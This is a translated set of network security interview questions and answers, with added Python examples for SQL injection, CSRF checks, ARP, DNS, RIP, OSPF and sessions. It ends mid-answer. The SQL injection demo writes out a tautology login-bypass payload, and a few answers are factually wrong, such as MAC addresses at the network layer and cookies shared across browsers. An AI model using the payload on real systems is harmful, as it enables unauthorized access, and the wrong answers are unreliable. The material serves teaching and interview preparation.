The most complete network security interview questions + answers in history

1. What is SQL injection attack?

Input from the front end was not parsed or escaped before being substituted into the database query, so the database treats it as part of the query and reports an error.
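The mechanism described above, as an added example that is not code from the original page: a login query built by string concatenation beside the same query with bound parameters, run against an in-memory SQLite table with constructed sample rows.

```python
import sqlite3


def make_db():
    """Constructed in-memory database with two sample accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, name, password):
    # The values are pasted into the SQL text, so the database parses them as
    # query syntax instead of treating them as data.
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, name, password):
    # Bound parameters: the driver hands the values to the database separately
    # from the SQL text, so a quote in the input cannot change the query.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (name, password)))


def raises_sql_error(login, conn, name, password):
    """True if this login function makes the database report a syntax error."""
    try:
        login(conn, name, password)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    # A stray quote breaks the query text: the "database reports an error"
    # symptom described above.
    print(raises_sql_error(login_vulnerable, db, "o'brien", "x"))   # True
    print(raises_sql_error(login_safe, db, "o'brien", "x"))         # False
    # The same mechanism lets input rewrite the WHERE clause; the bound
    # version simply finds no such account.
    print(login_vulnerable(db, "alice", "' OR '1'='1"))   # ['alice', 'bob']
    print(login_safe(db, "alice", "' OR '1'='1"))         # []
```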

2. What is XSS attack?

Cross-site scripting attacks embed malicious client-side scripts in web pages. JavaScript is the usual language, but other scripting languages are also used.

It is a client-side attack. The victim is the user, and the website administrator is also a user. The attacker usually relies on the administrator's identity as a springboard.

3. What is CSRF attack?

When the program was developed, the token and Referer of the relevant pages were not validated, allowing an attacker to construct his own URL and trick the target user into clicking it.
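The two missing checks named above, token and Referer, as an added example (my own code, not from the original page): a state-changing request is accepted only when the form token matches the session-bound one and the Origin or Referer names the site's own host, which is assumed here to be app.example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Hostname of the protected site (assumed for this example).
SITE_HOST = "app.example"


def issue_token(session):
    """Create a random per-session token; the page embeds it in its forms."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def host_of(url):
    """Hostname named by an Origin/Referer header value, or None if absent."""
    return urlsplit(url).hostname if url else None


def is_request_allowed(session, request):
    """Decide whether a state-changing request may proceed.

    request is a constructed dict: {"headers": {...}, "form": {...}}.
    Both checks the answer above says were missing are applied:
      1. the token in the form must equal the one bound to the session;
      2. the Origin (or, failing that, Referer) header must name our host.
    """
    expected = session.get("csrf_token")
    submitted = request["form"].get("csrf_token", "")
    # Constant-time comparison, so timing cannot leak the token.
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False
    headers = request["headers"]
    source = headers.get("Origin") or headers.get("Referer")
    # A missing or foreign source (including "null") is rejected. This is the
    # strict choice; a site may decide to tolerate a missing Referer.
    return host_of(source) == SITE_HOST


def demo():
    session = {}
    token = issue_token(session)
    # Constructed requests: a legitimate form post and a forged cross-site one.
    legit = {"headers": {"Origin": "https://app.example"},
             "form": {"csrf_token": token, "amount": "10"}}
    forged = {"headers": {"Referer": "https://attacker.example/page.html"},
              "form": {"amount": "10"}}
    return is_request_allowed(session, legit), is_request_allowed(session, forged)


if __name__ == "__main__":
    print(demo())   # (True, False)
```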

4. What is a file upload vulnerability?

An arbitrary file upload vulnerability arises when the programmer's control or processing of the file upload function is insufficient or defective, so that a user can upload executable dynamic script files to the server beyond his or her own permissions.

5. DDoS attack

Distributed denial of service: a DDoS attack uses client/server technology to unite multiple computers as an attack platform and launch a denial of service attack on one or more targets, thereby multiplying the power of the attack.

6. Which layers the important protocols belong to

1. Network layer: IP protocol + MAC address

2. Transport layer: TCP, UDP protocols

3. Application layer: HTTP, SSH, FTP protocols

7. Working principle of the ARP protocol

Whenever a host has an IP datagram to send to another host, it needs to know the logical (IP) address of the recipient. But the datagram must be encapsulated in a frame to cross the physical network, which means the sender must also have the physical (MAC) address of the receiver, so the mapping from logical address to physical address has to be completed. The ARP protocol receives the logical address from the IP protocol, maps it to the corresponding physical address, and hands that physical address to the data link layer.

8. What is RARP? How does it work?

In a computer network, each device has a unique physical address (MAC address) that identifies it on the local network. However, to communicate on the network, each device also needs a unique IP address. Typically, IP addresses are configured manually, but in some cases automatic IP address assignment is required, and this is where the RARP protocol is used.

1. When a device starts up, it will send a RARP request to the network to obtain its own IP address.

2. After receiving the request, the RARP server will search for the MAC address of the device and return its corresponding IP address to the device.

3. After the device receives the IP address, it can start communicating on the network.

It should be noted that the RARP protocol only works within a LAN, because all devices involved must be on the same physical network. In larger networks, the DHCP protocol is used instead to assign IP addresses automatically.
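ARP and RARP share one packet format and differ only in the opcode, so a single added example (my own code, not from the original page) covers both questions 7 and 8: it builds and parses the 28-byte packet body and shows one station answering an ARP request for its own IP and, acting as the RARP server, answering a RARP request from a constructed MAC-to-IP table.

```python
import ipaddress
import struct

# ARP body as carried after the Ethernet header: hardware type, protocol type,
# hardware/protocol address lengths, opcode, then the two address pairs.
ARP_FORMAT = "!HHBBH6s4s6s4s"          # 28 bytes, network byte order
OPCODES = {1: "ARP request", 2: "ARP reply",
           3: "RARP request", 4: "RARP reply"}


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Serialise an ARP/RARP packet for Ethernet (6-byte) and IPv4 (4-byte)."""
    return struct.pack(ARP_FORMAT, 1, 0x0800, 6, 4, opcode,
                       mac_to_bytes(sender_mac),
                       ipaddress.IPv4Address(sender_ip).packed,
                       mac_to_bytes(target_mac),
                       ipaddress.IPv4Address(target_ip).packed)


def parse_arp(packet):
    """Decode a packet; rejects anything that is not Ethernet/IPv4 ARP."""
    if len(packet) < struct.calcsize(ARP_FORMAT):
        raise ValueError("truncated ARP packet")
    htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa = struct.unpack(
        ARP_FORMAT, packet[:28])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported hardware/protocol combination")
    return {"opcode": opcode, "operation": OPCODES.get(opcode, "unknown"),
            "sender_mac": bytes_to_mac(sha),
            "sender_ip": str(ipaddress.IPv4Address(spa)),
            "target_mac": bytes_to_mac(tha),
            "target_ip": str(ipaddress.IPv4Address(tpa))}


def respond(packet, my_mac, my_ip, rarp_table):
    """What one station sends back, or None if the packet is not for it.

    For an ARP request the station answers only when the target IP is its own.
    For a RARP request the station acts as the RARP server and looks the
    requester's MAC up in rarp_table ({mac: ip}, constructed for the demo).
    """
    req = parse_arp(packet)
    if req["opcode"] == 1 and req["target_ip"] == my_ip:
        return build_arp(2, my_mac, my_ip, req["sender_mac"], req["sender_ip"])
    if req["opcode"] == 3:
        assigned = rarp_table.get(req["target_mac"])
        if assigned is not None:
            return build_arp(4, my_mac, my_ip, req["target_mac"], assigned)
    return None


if __name__ == "__main__":
    # Constructed sample: host .1 asks who has 10.0.0.2; host .2 answers.
    who_has = build_arp(1, "02:00:00:00:00:01", "10.0.0.1",
                        "00:00:00:00:00:00", "10.0.0.2")
    reply = respond(who_has, "02:00:00:00:00:02", "10.0.0.2", {})
    print(parse_arp(reply)["operation"], parse_arp(reply)["sender_mac"])
    # A diskless station asks for its own IP; the RARP server answers.
    rarp_req = build_arp(3, "02:00:00:00:00:03", "0.0.0.0",
                         "02:00:00:00:00:03", "0.0.0.0")
    rarp_reply = respond(rarp_req, "02:00:00:00:00:02", "10.0.0.2",
                         {"02:00:00:00:00:03": "10.0.0.3"})
    print(parse_arp(rarp_reply)["target_ip"])
```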

9. What is DNS? How does DNS work?

DNS is a distributed naming system that maps domain names to IP addresses. The main role of DNS is to convert user-friendly domain names into IP addresses that computers can understand so that user requests can be routed to the correct server.

How DNS works:

1. The user enters a domain name in the browser, such as www.example.com.

2. The operating system sends a DNS query request to the local DNS server, asking for the IP address of the domain name www.example.com.

3. If the local DNS server has the IP address of www.example.com stored in its cache, it will return that IP address.

4. If the local DNS server does not know the IP address of www.example.com, it will send a query request to the root DNS server.

5. The root DNS server will direct the local DNS server to the top-level DNS server responsible for the .com domain.

6. The local DNS server will send a query request to the .com top-level DNS server to request the IP address of www.example.com.

7. The .com top-level DNS server will direct the local DNS server to the authoritative DNS server responsible for example.com.

8. The local DNS server will send a query request to the authoritative DNS server of example.com, requesting the IP address of www.example.com.

9. The authoritative DNS server will return the IP address of www.example.com, and the local DNS server will cache the result and return it to the operating system.

10. The operating system will use the IP address to connect to the server of www.example.com to obtain the required web pages or other resources.
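The ten steps above, as an added example (my own code, not from the original page): a local resolver with a cache walks a constructed root, .com and example.com server chain, following referrals until an authoritative answer, and serves the second lookup from cache. The server data and the address 192.0.2.10 are constructed sample values.

```python
# Constructed sample name servers: each knows answers for names it is
# authoritative for, and referrals (delegations) for zones it hands off.
SERVERS = {
    "root": {"answers": {}, "referrals": {"com": "tld-com"}},
    "tld-com": {"answers": {}, "referrals": {"example.com": "auth-example"}},
    "auth-example": {"answers": {"www.example.com": "192.0.2.10"},
                     "referrals": {}},
}


def ask(server_name, qname):
    """One query to one server.

    Returns ("answer", ip), ("referral", next_server) or ("nxdomain", None).
    """
    server = SERVERS[server_name]
    if qname in server["answers"]:
        return "answer", server["answers"][qname]
    labels = qname.split(".")
    # Try the most specific delegation first: "example.com" before "com".
    for i in range(len(labels)):
        suffix = ".".join(labels[i:])
        if suffix in server["referrals"]:
            return "referral", server["referrals"][suffix]
    return "nxdomain", None


class LocalResolver:
    """The recursive resolver the client's OS talks to (steps 2 to 9 above)."""

    def __init__(self):
        self.cache = {}

    def resolve(self, qname):
        """Returns (ip or None, list of servers consulted)."""
        if qname in self.cache:
            return self.cache[qname], ["cache"]
        trace = []
        server = "root"
        while True:
            trace.append(server)
            kind, value = ask(server, qname)
            if kind == "answer":
                self.cache[qname] = value        # step 9: cache the result
                return value, trace
            if kind == "referral" and value not in trace:
                server = value                   # follow the delegation chain
                continue
            return None, trace                   # no such name (or a loop)


if __name__ == "__main__":
    resolver = LocalResolver()
    print(resolver.resolve("www.example.com"))
    # ('192.0.2.10', ['root', 'tld-com', 'auth-example'])
    print(resolver.resolve("www.example.com"))
    # ('192.0.2.10', ['cache'])
```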

10. What is the RIP protocol? How does RIP work?

RIP is a distance vector-based routing protocol used to exchange routing information in a LAN or WAN and calculate the best routing path. RIP is a relatively simple routing protocol commonly used in small network environments.

How the RIP protocol works:

1. The RIP protocol divides the entire network into several network segments. Each network segment has a unique identifier, called a network number.

2. Each router maintains a routing table, recording the distance to different networks and the information of the next hop router.

3. The router will periodically broadcast its routing table information to neighboring routers to let neighboring routers know its routing situation.

4. When a router receives routing information from an adjacent router, it compares it with its own routing table. If the adjacent router offers a shorter path, it updates its own routing table with this information and broadcasts the change to its neighboring routers.

5. The router will continuously update its routing table until all routing information has been propagated to every router in the network and all routing tables in the network are consistent.

11. Disadvantages of RIP

1. Slow convergence speed: When a fault occurs or the topology changes in the network, the RIP protocol takes a long time to update the routing table of the entire network. This is because the RIP protocol has a long update cycle and uses a distance vector algorithm, which cannot quickly adapt to network changes.

2. Does not support large-scale networks: The RIP protocol can only support smaller-scale networks. When the network scale becomes larger, the RIP protocol will generate a large amount of routing information, thereby consuming a large amount of bandwidth and processing power, resulting in a decline in network performance.

3. Does not support VLSM: The RIP protocol can only support fixed-length subnet masks and cannot support variable-length subnet masks (VLSM), which limits the application of the RIP protocol in complex network environments.

4. Poor security: The RIP protocol does not verify and encrypt routing information, making it vulnerable to deception and attacks, leading to network security problems.
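Serving both the RIP description in question 10 and the slow-convergence point in question 11, the following added example (my own code, not from the original page) simulates distance-vector exchange rounds on a constructed three-router chain with the RIP limit of 16 hops and no split horizon: the initial tables settle in two rounds, but after a link failure the two remaining routers count up to 16 before agreeing the destination is unreachable.

```python
INFINITY = 16   # RIP's metric limit: 16 hops means unreachable


class Router:
    def __init__(self, name):
        self.name = name
        self.neighbors = {}                 # neighbour name -> link cost
        self.table = {name: (0, None)}      # destination -> (metric, next hop)


def link(a, b, cost=1):
    a.neighbors[b.name] = cost
    b.neighbors[a.name] = cost


def cut_link(a, b):
    """Link failure: both ends lose each other and mark routes that used the
    dead link as unreachable (they may relearn them from other neighbours)."""
    del a.neighbors[b.name]
    del b.neighbors[a.name]
    for router, gone in ((a, b.name), (b, a.name)):
        for dest, (metric, nxt) in list(router.table.items()):
            if nxt == gone:
                router.table[dest] = (INFINITY, nxt)


def exchange_round(routers):
    """Every router advertises its table to each neighbour, with no split
    horizon, exactly as the plain protocol above describes. Returns True if
    any table changed."""
    changed = False
    # Each router receives what its neighbours had at the start of the round.
    advertised = {r.name: dict(r.table) for r in routers.values()}
    for r in routers.values():
        for nb, cost in r.neighbors.items():
            for dest, (metric, _) in advertised[nb].items():
                new_metric = min(metric + cost, INFINITY)
                cur_metric, cur_next = r.table.get(dest, (INFINITY, None))
                # Distance-vector rule: accept a shorter path, or whatever
                # the neighbour we already route through now reports.
                if new_metric < cur_metric or cur_next == nb:
                    if (new_metric, nb) != (cur_metric, cur_next):
                        r.table[dest] = (new_metric, nb)
                        changed = True
    return changed


def converge(routers, max_rounds=100):
    """Run rounds until one changes nothing; returns the rounds that changed."""
    for rounds in range(max_rounds):
        if not exchange_round(routers):
            return rounds
    return max_rounds


def metric(router, dest):
    return router.table.get(dest, (INFINITY, None))[0]


def demo():
    # Constructed chain topology A - B - C, one hop per link.
    a, b, c = Router("A"), Router("B"), Router("C")
    routers = {"A": a, "B": b, "C": c}
    link(a, b)
    link(b, c)
    initial_rounds = converge(routers)      # 2 rounds: fast
    cut_link(b, c)
    recovery_rounds = converge(routers)     # 14 rounds: counting to infinity
    return initial_rounds, recovery_rounds, metric(a, "C"), metric(b, "C")


if __name__ == "__main__":
    print(demo())   # (2, 14, 16, 16)
```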

12. What is the OSPF protocol? How does OSPF work?

OSPF is a link-state routing protocol used within a single autonomous system (AS); it runs the shortest path first (SPF) algorithm to determine the forwarding path of data packets.

How the OSPF protocol works:

1. Neighbor discovery: In the neighbor discovery phase, the OSPF protocol confirms neighbor relationships by sending and receiving Hello messages. If a neighbor relationship is established between two routers, they will begin to exchange routing information.

2. Link state database synchronization: Each OSPF router stores its link state information in a local link state database (LSDB). When two routers establish a neighbor relationship, they exchange their link state information and store it in their local LSDBs, and each router then works to bring its LSDB into sync with its neighbor's.

3. SPF calculation: Once a router has a complete LSDB, it uses the SPF algorithm to calculate the shortest path tree and derives its routing table from it. The shortest path tree holds the shortest path from this router to every other router.

4. Routing update: Each router periodically sends update messages to notify the other routers when its link state has changed. When a router receives an update message, it updates its LSDB and recalculates the shortest path tree.

5. Data transmission: When a data packet arrives at a router, the router will use the shortest path tree to determine the next router and forward the data packet to that router.
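Steps 3 and 4 above, as an added example (my own code, not from the original page): Dijkstra's SPF run over a link-state database to produce a routing table with next hops, then a link failure flooded as a fresh LSA and the recalculation that follows. The four-router topology and its costs are constructed for the demo.

```python
import heapq


def spf(lsdb, source):
    """Dijkstra over the link-state database.

    lsdb maps each router to the links it advertised: {router: {nbr: cost}}.
    Returns the routing table {dest: (total cost, next hop)} derived from the
    shortest path tree rooted at source.
    """
    dist = {source: 0}
    prev = {}
    heap = [(0, source)]
    done = set()
    while heap:
        d, u = heapq.heappop(heap)
        if u in done:
            continue
        done.add(u)
        for v, cost in lsdb.get(u, {}).items():
            nd = d + cost
            if nd < dist.get(v, float("inf")):
                dist[v] = nd
                prev[v] = u
                heapq.heappush(heap, (nd, v))
    table = {}
    for dest in dist:
        if dest == source:
            continue
        hop = dest                     # walk the tree back to the first hop
        while prev[hop] != source:
            hop = prev[hop]
        table[dest] = (dist[dest], hop)
    return table


def set_link(lsdb, a, b, cost):
    """Both ends flood a fresh LSA describing the link (cost None = link
    down); every router that receives it replaces the entry and reruns SPF."""
    for x, y in ((a, b), (b, a)):
        links = lsdb.setdefault(x, {})
        if cost is None:
            links.pop(y, None)
        else:
            links[y] = cost


def demo():
    # Constructed topology: R1-R2 (1), R2-R3 (1), R1-R3 (5), R3-R4 (1).
    lsdb = {}
    set_link(lsdb, "R1", "R2", 1)
    set_link(lsdb, "R2", "R3", 1)
    set_link(lsdb, "R1", "R3", 5)
    set_link(lsdb, "R3", "R4", 1)
    before = spf(lsdb, "R1")
    set_link(lsdb, "R2", "R3", None)        # link failure: LSA update
    after = spf(lsdb, "R1")
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print(before)   # {'R2': (1, 'R2'), 'R3': (2, 'R2'), 'R4': (3, 'R2')}
    print(after)    # {'R2': (1, 'R2'), 'R3': (5, 'R3'), 'R4': (6, 'R3')}
```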

13. Summary of the differences between TCP and UDP?

1. Connection: TCP is a connection-oriented protocol, while UDP is a connectionless protocol. This means that TCP requires a connection to be established before sending data, while UDP does not.

2. Reliability: TCP provides reliable data transmission because it uses acknowledgment and retransmission mechanisms to ensure that data arrives correctly. UDP has no such mechanism, so packets may be lost.

3. Speed: UDP is faster than TCP because it has no connection setup or acknowledgment mechanism, so data can be transmitted sooner.

4. Bandwidth: TCP has adaptive congestion control, which can dynamically adjust the transmission rate to adapt to network conditions, thereby maximizing the use of available bandwidth. UDP does not have this function.

5. Scope of application: TCP is suitable for applications that require reliable transmission and orderly delivery, such as email, file transfer, and web browsers. UDP is suitable for applications that require fast transmission and real-time performance, such as video streaming, games and audio calls.

14. What are the three-way handshake and the four-way wave? Why does TCP need a three-way handshake?

The three-way handshake is the process of three data exchanges between the client and the server when establishing a TCP connection.

1. The client sends a SYN packet to the server, indicating a request to establish a connection.

2. The server receives the SYN request and sends a SYN+ACK packet to the client to confirm the request and agree to establish the connection.

3. The client receives the SYN+ACK request from the server and sends an ACK packet to the server to confirm that the connection has been established.

The four-way wave is the process of four data exchanges between the client and the server when closing a TCP connection.

1. The client sends a FIN packet to the server, indicating a request to close the connection.

2. The server receives the FIN request and sends an ACK packet to the client to confirm receipt of the request.

3. The server sends a FIN packet to the client, indicating that the server also requests to close the connection.

4. The client receives the server's FIN request and sends an ACK packet to the server to confirm receipt of the request and the connection is officially closed.

Why does TCP need three handshakes?

Mainly to ensure the reliability of the connection. During the process of establishing a connection, it is necessary to ensure that the sending and receiving capabilities of both parties are normal, otherwise normal communication will not be possible after the connection is established. The three-way handshake ensures normal information transfer between the client and the server and prevents delayed packets in the network from being mistaken for valid connection requests.

15. The difference between GET and POST

1. GET requests are used to obtain resources and usually do not change the data on the server. GET requests pass data through the URL, and the data is appended to the end of the URL to form a query string. The query string starts with a question mark "?" and the parameters are connected with the "&" symbol. Since the data is passed in clear text, it is not suitable for transmitting sensitive data. In addition, the length of URLs is limited, and different browsers have different restrictions on URL length.

2. POST requests are used to submit data, which usually changes the data on the server. POST requests pass data in the request body, and the data is not appended to the URL. Because the data is carried in the request body, there is no URL length limit for POST requests. POST requests are suitable for transmitting large amounts of data or sensitive data. In short, GET requests are suitable for requesting data, while POST requests are suitable for submitting data.

16. The difference between cookies and sessions

The main difference between cookies and sessions is that cookies are a technology that stores data on the client side, while a session is a technology that stores data on the server side. Cookies can store only simple information, while a session can store any type of data. In addition, cookies can be shared between multiple browsers, while a session can only be shared within the same browser.

17. How does session work?

1. When a user accesses a page that requires authentication, the server creates a unique Session ID and stores the ID in a data structure called a Session object.

2. The server will send the Session ID to the client's browser, usually by setting a header named "Set-Cookie" in the HTTP response header.

3. When the client's browser receives the Session ID sent by the server, it stores the ID in a data structure called a cookie so that the ID can be sent back to the server in subsequent requests.

4. When the user makes other requests, the browser will automatically send the cookie containing the Session ID back to the server. The server will find the corresponding Session object based on the Session ID, and read or store the user data associated with the Session object.

5. When the user closes the browser or the Session times out, the Session object and Session data will be deleted from the server memory to release server resources.
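The five steps above, as an added example (my own code, not from the original page): a server-side session store that mints an unguessable Session ID, issues the Set-Cookie header with hardening attributes, finds the session from the Cookie request header, and drops it when it times out. The time values are passed in explicitly so the example runs deterministically.

```python
import secrets


def parse_cookie_header(value):
    """Split a Cookie request header ("a=1; sid=abc") into a dict."""
    cookies = {}
    for part in (value or "").split(";"):
        if "=" in part:
            name, val = part.strip().split("=", 1)
            cookies[name] = val
    return cookies


class SessionStore:
    """Server-side session table keyed by an unguessable session ID."""

    def __init__(self, ttl_seconds=1800):
        self.ttl = ttl_seconds
        self.sessions = {}      # session id -> {"data": {...}, "expires": t}

    def create(self, data, now):
        """Step 1: make the Session ID (256 random bits, so it cannot be
        guessed or enumerated) and store the session object under it."""
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"data": dict(data), "expires": now + self.ttl}
        return sid

    @staticmethod
    def set_cookie_header(sid):
        """Step 2: the response header that hands the ID to the browser.
        HttpOnly keeps scripts from reading it, Secure keeps it off plain
        HTTP, SameSite=Lax stops most cross-site requests from carrying it."""
        return f"Set-Cookie: sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"

    def lookup(self, cookie_header, now):
        """Step 4: find the session named by the request's cookie. Returns the
        session data, or None if the ID is unknown or the session timed out
        (step 5: expired sessions are dropped from memory)."""
        sid = parse_cookie_header(cookie_header).get("sid")
        entry = self.sessions.get(sid)
        if entry is None:
            return None
        if now >= entry["expires"]:
            del self.sessions[sid]
            return None
        entry["expires"] = now + self.ttl      # activity extends the session
        return entry["data"]

    def destroy(self, sid):
        """Logout: forget the session server-side, whatever cookie remains."""
        self.sessions.pop(sid, None)


def demo():
    store = SessionStore(ttl_seconds=600)
    sid = store.create({"user": "alice"}, now=0)      # constructed login at t=0
    header = store.set_cookie_header(sid)
    active = store.lookup(f"theme=dark; sid={sid}", now=100)    # {'user': 'alice'}
    expired = store.lookup(f"sid={sid}", now=100 + 600)         # None: timed out
    return (header.startswith("Set-Cookie: sid="), active, expired,
            len(store.sessions))


if __name__ == "__main__":
    print(demo())   # (True, {'user': 'alice'}, None, 0)
```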

18. A complete HTTP request process

1. DNS resolution: When the browser initiates a URL request, it first needs to convert the domain name in the URL into the corresponding IP address. This process is called DNS resolution. The browser will first check whether the IP address of the domain name exists in the cache, and if not, initiate a request to the local DNS server.

2. Establish a TCP connection: Once the browser obtains the IP address of the target server, it needs to establish a TCP connection. A TCP connection is a reliable connection that is established through a three-way handshake.

3. Initiate an HTTP request: After the TCP connection is established, the browser will send an HTTP request to the server. HTTP requests include request method (GET, POST, PUT, DELETE, etc.), URL, HTTP version number, request header and other information.

4. Server response: After the server receives the request, it will process it according to the request content and return an HTTP response to the browser. HTTP response includes response status code, response header, response body and other information.

5. Receive response content: After the browser receives the HTTP response returned by the server, it will determine the type of the response body based on the Content-Type field in the response header, and then parse the response body into the corresponding format and render it.

6. Close the TCP connection: When the response content is transmitted, the TCP connection will be closed and resources will be released.

19. The difference between HTTPS and HTTP

HTTP is Hypertext Transfer Protocol, which is a basic protocol for transferring data, but it does not provide any data encryption or authentication capabilities. This means that the data transmitted by HTTP can be eavesdropped or tampered with, so it is not suitable for transmitting sensitive data such as credit card numbers, passwords, etc.

HTTPS is a security protocol based on HTTP, which ensures data security by adding SSL/TLS encryption on top of HTTP. HTTPS authenticates the web server by using digital certificates and uses public key encryption algorithms to encrypt data transmission to ensure that the data is not eavesdropped or tampered with during transmission. This makes HTTPS ideal for transmitting sensitive data such as credit card numbers, passwords, etc.

20. What are the seven-layer models of OSI?

Physical layer --> Data link layer --> Network layer --> Transport layer --> Session layer --> Presentation layer --> Application layer

21. The difference between http long connection and short connection

HTTP short connection means that after the client sends a request to the server, the server closes the connection immediately after returning a response. The advantage of this method is that it can save server resources, but each request requires establishing a new connection, which may increase the request delay and reduce performance.

HTTP long connection means that after a connection is established between the client and the server, multiple requests and responses are made on this connection. The advantage of this method is that it can reduce the cost of establishing a connection and improve performance, but it will increase the occupation of server resources.

It should be noted that HTTP long connections do not always maintain an open connection, but maintain the connection status within a certain period of time. After a certain period of time, if there are no new requests and responses, the connection will be automatically closed to release server resources.

22. How does TCP ensure reliable transmission?

1. Sequence number and acknowledgment mechanism: Each TCP segment carries a sequence number that identifies the position of its data in the stream. After receiving a segment, the TCP receiver sends an acknowledgment telling the sender which data has arrived. If the sender does not receive an acknowledgment, it resends the segment.

2. Sliding window mechanism: TCP uses a sliding window mechanism to control the amount of data sent by the sender. The receiver will tell the sender its receiving window size, and the sender will send data according to the receiver's window size. If the sender sends more data than the receiver's window size, the receiver will refuse to receive the excess data.

3. Timeout retransmission mechanism: If the sender does not receive a confirmation response, it will think that the data is lost and will resend the data. The sender will determine the time interval and number of retransmissions based on the timer to ensure reliable transmission of data.

4. Congestion control mechanism: TCP uses a congestion control mechanism to control traffic in the network to prevent network congestion. If there is congestion in the network, TCP will reduce the sending rate of the sender to reduce the degree of network congestion.

23. What are the common status codes?

1xx (informational status code): Indicates that the request has been received and processing continues.

100 Continue: The request has been accepted and the client should continue the request.

101 Switching Protocols: The requested protocol has changed.

2xx (success status code): Indicates that the request has been successfully received, understood, and accepted.

200 OK: The request was successfully processed.

201 Created: The request was successfully processed and the resource was created.

202 Accepted: The server has accepted the request, but has not completed the processing.

204 No Content: The request has been successfully processed, but there is no response content.

3xx (redirect status code): Indicates that further action from the client is required to complete the request.

301 Moved Permanently: The requested resource has been permanently moved to a new location.

302 Found: The requested resource has been temporarily moved to a new location.

304 Not Modified: The requested resource has not been modified and the client can use local cache.

4xx (client error status code): Indicates that the request submitted by the client has an error.

400 Bad Request: The request is invalid and the server cannot parse the request.

401 Unauthorized: The request requires authentication.

403 Forbidden: The request was rejected by the server.

404 Not Found: The requested resource does not exist.

5xx (server error status code): Indicates that the server encountered an error while processing the request.

500 Internal Server Error: Server internal error.

503 Service Unavailable: The server is currently unable to process the request. Generally, the server is overloaded or under maintenance.

24. What is SSL? How does HTTPS ensure the security of data transmission (how does SSL work to ensure security)?

SSL is used for secure communication on the network. The main purpose of SSL is to protect the security, integrity and confidentiality of data transmitted over the network.

HTTPS is a security protocol that adds the SSL/TLS protocol to the HTTP protocol, which can ensure that the communication between the website and the client is encrypted and secure.

How does HTTPS ensure the security of data transmission?

1. Encryption: The SSL/TLS protocol uses a combination of symmetric encryption and asymmetric encryption to ensure the security of data during transmission. Symmetric encryption is used to encrypt data, and asymmetric encryption is used to exchange keys between the client and server.

2. Authentication: The certificate issued by the certificate authority is used to verify the identity and public key of the server to prevent man-in-the-middle attacks and deception.

3. Integrity: The SSL/TLS protocol uses a message digest algorithm to generate a message digest by hashing the message to ensure data integrity during transmission.

25. How to ensure that the public key is not tampered with?

1. Digital signature: Before the public key is released, use the private key to digitally sign the public key. In this way, when verifying the public key, you only need to verify the digital signature to determine the authenticity of the public key.

2. Public Key Infrastructure (PKI): PKI is a set of technologies and protocols used to manage digital certificates and public keys to ensure the security and reliability of public keys.

3. Public key hashing: Hash the public key and then publish the hash value to ensure that the public key has not been tampered with.

4. Physical protection: Storing the public key in a physical device, such as a smart card or USB key, can protect the public key from tampering.

26. How to use absolute path in php?

1. __DIR__ or dirname(__FILE__): Both give the directory of the current script, that is, the path of the folder the script is in. You can then use the realpath() function to convert the directory name to an absolute path. For example: $absPath = realpath(dirname(__FILE__));

2. $_SERVER['DOCUMENT_ROOT']: This variable contains the absolute path to the document root directory where the current script is located. You can use this variable with the $_SERVER['PHP_SELF'] variable to get the absolute path to the current script. For example: $absPath = $_SERVER['DOCUMENT_ROOT'] . $_SERVER['PHP_SELF'];

It should be noted that you need to pay attention to security when using the $_SERVER['PHP_SELF'] variable, as it may be attacked by malicious users. It is recommended to use $_SERVER['SCRIPT_NAME'] or $_SERVER['SCRIPT_FILENAME'] variables instead of $_SERVER['PHP_SELF'].

27. What are your commonly used penetration tools, and which one is the most commonly used?

1. Burp Suite

2. SQLmap

3. Nmap

4. Kali Linux

5. Hydra

6. Swiss Army Knife

28. Exploiting blind XSS against intranet servers

Blind XSS means that the attacker directly attempts to exploit a suspected XSS vulnerability without first confirming that it exists. In some cases, attackers may reach intranet servers through blind XSS.

An attacker may use XSS vulnerabilities to inject malicious code, so that after the code is executed in the victim's browser, a request is sent to a server controlled by the attacker to obtain sensitive information of the intranet server. This attack method usually requires the attacker to prepare a malicious server in advance to receive requests sent to the server and obtain sensitive information.

29. Spear phishing attacks and watering hole attacks

1. A spear phishing attack is an attack in which hackers deceive specific targets by pretending to be a trusted source, in order to obtain sensitive information or carry out other malicious activities. This kind of attack is usually carried out through email or social media. The hackers target a specific person or organization and, by forging trust, guide the victim to click on a link or download an attachment, causing the victim to leak confidential information or install malware.

2. A watering hole attack is an attack in which hackers compromise websites frequently visited by the victims in order to obtain sensitive information or carry out other malicious activities. The attack is aimed at the target website, so that users who visit it are infected or redirected to malicious websites, allowing the hackers to obtain the users' sensitive information or control their computers.

Briefly: a spear phishing attack targets a specific individual or organization, while a watering hole attack targets a wide range of users.

30. What is virtual machine escape?

This refers to an attacker taking advantage of vulnerabilities in virtualization software or operating systems to gain control of the physical host from the virtual machine (VM) environment. An attacker can use virtual machine escape attacks to bypass security measures, gain access to the entire physical host, and access all sensitive data stored within it.

31. Man-in-the-middle attack?

It refers to an attack method in which the attacker steals the communication data between the two parties during the communication process and attempts to tamper with or replay the data. Attackers usually insert a malicious intermediate node between the user and the server. This node will pretend to be a normal communication node, making both parties think they are communicating directly with the other party.

32. TCP three-way handshake process?

1. The client sends a connection request (SYN) packet to the server, which carries the client's initial sequence number (ISN).

2. After the server receives the request, it replies with a SYN+ACK packet whose acknowledgment number confirms the client's ISN and which carries the server's own initial sequence number (ISN).

